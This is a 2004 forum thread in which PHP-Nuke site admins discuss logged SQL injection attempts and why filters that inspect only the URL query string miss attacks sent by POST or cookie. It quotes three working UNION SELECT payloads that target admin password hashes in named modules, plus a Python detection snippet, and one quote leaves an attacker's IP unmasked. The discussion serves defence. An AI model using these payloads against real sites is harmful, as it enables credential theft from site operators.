Waraxe IT Security Portal
www.waraxe.us Forum Index -> PhpNuke -> Caution, fortress & co are useless
Caution, fortress & co are useless
Posted: Sun Jun 06, 2004 10:11 am
Tora
Regular user
Joined: May 19, 2004
Posts: 9
Location: Germany

Here are 3 examples from our detection log files:
Quote:
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
Quote:
request:
_GET[name] = Journal
_POST[file] = search
_POST[disp] = search
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Journal
REQUEST_URI: /modules.php?name=Journal
Quote:
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=FAQ
REQUEST_URI: /modules.php?name=FAQ

As you can see, the hackers do not attack over the URL. They dispatch the data over a form by using POST. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Here is a critical report on an older version of fortress. In addition, most of what is described also applies to the new version.
http://vkp.shiba.de/doku/fortress.htm
Sorry, only in German...

Best wishes and greetings from Germany
Andi (aka Tora)


Last edited by Tora on Mon Jun 07, 2004 12:09 am; edited 1 time in total
Posted: Sun Jun 06, 2004 11:16 am
SteX
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia

I never installed that shits of protect .. :)

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
Posted: Sun Jun 06, 2004 2:36 pm
LINUX
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman

Quote:
As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.



Script Kiddie


A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability
Posted: Sun Jun 06, 2004 4:00 pm
Tora
Regular user
Joined: May 19, 2004
Posts: 9
Location: Germany

Quote:
Script Kiddie

:?: :?: Who is the script kiddie :?: :?:

_________________
Greetings from Germany
Andi aka Tora, SiteAdmin @ pragmamx.org pragmaMx developer-team
Posted: Sun Jun 06, 2004 5:35 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Tora knows the stuff, it's obvious from his posts. Scriptkiddies are beginners who have learned how to USE exploits, but they do not YET fully understand how it works. Tora has, in my opinion, advanced knowledge/skills in phpnuke/mysql and other stuff; he/she is definitely not a scriptkiddie 8) ;)


argentino wrote:
Quote:
As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.



Script Kiddie


A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability
Re: Caution, fortress & co are useless
Posted: Sun Jun 06, 2004 5:39 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Yes, you are absolutely right - sanitizing only the GET parameters/QUERY string is useless, and POST and COOKIE variables must be sanitized too. Because phpnuke globalizes all the GET/POST/COOKIE parameters, it's not hard for an attacker to inject malicious requests through COOKIE, for example...
I suggest using the Sentinel protection system. It's my favorite at the moment, and it will add a good security layer between potential attackers and the website.

Tora wrote:
Here are 3 examples from our detection log files:
Quote:
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
Quote:
request:
_GET[name] = Journal
_POST[file] = search
_POST[disp] = search
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=Journal
REQUEST_URI: /modules.php?name=Journal
Quote:
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=FAQ
REQUEST_URI: /modules.php?name=FAQ

As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Here is a critical report over an older version of fortress. In addition, most described applies to the new version.
http://vkp.shiba.de/doku/fortress.htm
Sorry, only in german language...

best wishes and greetings from germany
Andi (aka Tora)
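The point made in this thread, as an added example that is not part of any post: a check that reads only QUERY_STRING misses all three logged requests, while a check over every GET, POST and COOKIE value flags them. The log sample is abridged from the first post; the `union select` signature and all function names are assumptions chosen for illustration.

```python
import re

# Constructed sample: the three requests from the first post's detection log,
# abridged but kept in the same "_SOURCE[key] = value" / "NAME: value" layout.
SAMPLE_LOG = """\
request:
_GET[name] = Encyclopedia
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
QUERY_STRING: name=Encyclopedia
request:
_GET[name] = Journal
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
QUERY_STRING: name=Journal
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
QUERY_STRING: name=FAQ
"""

PARAM = re.compile(r"^_(GET|POST|COOKIE)\[([^\]]+)\] = (.*)$")
# Assumed, deliberately simple signature; real filters use larger rule sets.
SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)

def parse_entries(text):
    """Split the log into requests: {'params': [(source, key, value)], 'query_string': str}."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line == "request:":
            entries.append({"params": [], "query_string": ""})
        elif not entries:
            continue  # ignore anything before the first request
        elif (m := PARAM.match(line)):
            entries[-1]["params"].append(m.groups())
        elif line.startswith("QUERY_STRING:"):
            entries[-1]["query_string"] = line.split(":", 1)[1].strip()
    return entries

def flagged_by_query_string(entry):
    """What a QUERY_STRING-only filter sees: just the URL part of the request."""
    return bool(SIGNATURE.search(entry["query_string"]))

def flagged_params(entry):
    """Check every GET, POST and COOKIE value; return the (source, key) pairs that match."""
    return [(src, key) for src, key, val in entry["params"] if SIGNATURE.search(val)]
```

Signature matching of this kind is a detection layer only; the module queries that accept these parameters remain injectable until they are fixed.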